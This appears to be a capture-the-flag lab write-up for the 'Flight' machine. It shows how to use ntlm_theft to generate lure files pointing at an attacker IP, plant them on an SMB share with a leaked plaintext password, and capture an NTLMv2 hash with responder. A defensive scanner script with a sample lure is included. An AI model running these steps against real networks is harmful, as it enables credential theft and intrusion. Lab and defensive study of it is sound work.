ntlm_theft.py

1. Overview

A script that generates, in one go, the 'trap files' which, once planted on the victim PC, make it connect to the hacker's (attacker's) computer.

2. Usage

2.1. Installation

Install it by downloading the code from GitHub.

┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# git clone https://github.com/Greenwolf/ntlm_theft.git
Cloning into 'ntlm_theft'...
remote: Enumerating objects: 151, done.
remote: Counting objects: 100% (38/38), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 151 (delta 31), reused 24 (delta 24), pack-reused 113 (from 1)
Receiving objects: 100% (151/151), 2.12 MiB | 9.58 MiB/s, done.
Resolving deltas: 100% (73/73), done.

2.2. Generating the files

┌──(root㉿kali)-[/home/kali/labs/Flight/ntlm_theft]
└─# python ntlm_theft.py -g all -s 10.10.14.143 -f flight
/home/kali/labs/Flight/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
  location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: flight/flight.scf (BROWSE TO FOLDER)
Created: flight/flight-(url).url (BROWSE TO FOLDER)
Created: flight/flight-(icon).url (BROWSE TO FOLDER)
Created: flight/flight.lnk (BROWSE TO FOLDER)
Created: flight/flight.rtf (OPEN)
Created: flight/flight-(stylesheet).xml (OPEN)
Created: flight/flight-(fulldocx).xml (OPEN)
Created: flight/flight.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(includepicture).docx (OPEN)
Created: flight/flight-(remotetemplate).docx (OPEN)
Created: flight/flight-(frameset).docx (OPEN)
Created: flight/flight-(externalcell).xlsx (OPEN)
Created: flight/flight.wax (OPEN)
Created: flight/flight.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: flight/flight.asx (OPEN)
Created: flight/flight.jnlp (OPEN)
Created: flight/flight.application (DOWNLOAD AND OPEN)
Created: flight/flight.pdf (OPEN AND ALLOW)
Created: flight/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: flight/flight.library-ms (BROWSE TO FOLDER)
Created: flight/Autorun.inf (BROWSE TO FOLDER)
Created: flight/desktop.ini (BROWSE TO FOLDER)
Created: flight/flight.theme (THEME TO INSTALL
Generation Complete.

2.2.1. Checking the generated files

They are created inside the flight folder.

┌──(root㉿kali)-[/home/…/labs/Flight/Flight-2/ntlm_theft]
└─# cd flight    
                                                                                                                                                                                             
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# ls
 Autorun.inf         'flight-(externalcell).xlsx'   flight.htm                      flight.library-ms  'flight-(remotetemplate).docx'   flight.theme
 desktop.ini         'flight-(frameset).docx'      'flight-(icon).url'              flight.lnk          flight.rtf                     'flight-(url).url'
 flight.application  'flight-(fulldocx).xml'       'flight-(includepicture).docx'   flight.m3u          flight.scf                      flight.wax
 flight.asx          'flight-(handler).htm'         flight.jnlp                     flight.pdf         'flight-(stylesheet).xml'        zoom-attack-instructions.txt

2.3. Uploading via smbclient

┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# smbclient //10.129.228.120/Shared -U s.moon%'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \flight.asx
putting file flight-(fulldocx).xml as \flight-(fulldocx).xml (75.7 kb/s) (average 75.7 kb/s)
putting file flight.theme as \flight.theme (2.9 kb/s) (average 48.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.lnk
NT_STATUS_ACCESS_DENIED opening remote file \flight-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.scf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.pdf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \flight.wax
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \flight-(remotetemplate).docx
putting file flight-(stylesheet).xml as \flight-(stylesheet).xml (0.3 kb/s) (average 35.3 kb/s)
putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 27.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.rtf
NT_STATUS_ACCESS_DENIED opening remote file \flight.m3u
NT_STATUS_ACCESS_DENIED opening remote file \flight.htm
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file flight.jnlp as \flight.jnlp (0.3 kb/s) (average 23.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \flight-(handler).htm
putting file flight.application as \flight.application (2.9 kb/s) (average 20.0 kb/s)
putting file flight.library-ms as \flight.library-ms (2.1 kb/s) (average 17.6 kb/s)
smb: \> 
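As a defensive counterpart to the upload above, the following added script (not part of ntlm_theft or this writeup) scans a copy of a share for files that reference a UNC host outside an allow-list, which is the tell-tale of the lure files generated here; the trusted-host set, the 203.0.113.10 address and the sample files are constructed for the demo.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Suffixes ntlm_theft emits that Explorer parses on folder browse alone
# (taken from the tool's "BROWSE TO FOLDER" lines in the output above).
BROWSE_TRIGGER = {".scf", ".url", ".lnk", ".library-ms", ".inf", ".ini"}
# Matches \\host\share\file or file://host/share/file; group 1 is the host.
UNC_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9][A-Za-z0-9.\-]*)[\\/][^\s\"'<>]*")

def untrusted_unc_refs(text, trusted_hosts):
    """Return (host, reference) pairs whose host is not in trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    return [(m.group(1), m.group(0)) for m in UNC_RE.finditer(text)
            if m.group(1).lower() not in trusted]

def file_text(path):
    """Plain files are read as text; OOXML (docx/xlsx) is a zip, so every
    member is read, because remote-template/picture links sit in the inner XML."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as z:
            return "\n".join(z.read(n).decode("utf-8", "ignore") for n in z.namelist())
    return path.read_text(encoding="utf-8", errors="ignore")

def scan_share(root, trusted_hosts):
    """Walk a share copy and flag files pointing at hosts outside trusted_hosts."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        for host, ref in untrusted_unc_refs(file_text(path), trusted_hosts):
            findings.append({"file": str(path.relative_to(root)), "host": host,
                             "ref": ref, "zero_click": path.suffix.lower() in BROWSE_TRIGGER})
    return findings

def demo():
    """Constructed sample share: one desktop.ini lure, one benign text file."""
    root = Path(tempfile.mkdtemp())
    (root / "desktop.ini").write_text(
        "[.ShellClassInfo]\nIconResource=\\\\203.0.113.10\\share\\icon.ico\n")
    (root / "readme.txt").write_text("Maps on \\\\fileserver01\\public\\maps\n")
    return scan_share(root, trusted_hosts={"fileserver01"})

if __name__ == "__main__":
    for f in demo():
        print(f)
```

Run against a mounted or copied share; a hit with zero_click set means the host leaks credentials as soon as a user opens that folder in Explorer, so the file should be quarantined and outbound SMB to the flagged host blocked.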

2.4. Receiving with responder

With responder running, you can confirm that the NTLM hash is sent to my Kali machine by way of the uploaded files.

┌──(root㉿kali)-[/home/kali]
└─# responder -I tun0               
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.6.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[...SNIP...]

[SMB] NTLMv2-SSP Client   : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:a58779842e69f28b[...SNIP...]
[*] Skipping previously captured hash for flight.htb\c.bum

[...SNIP...]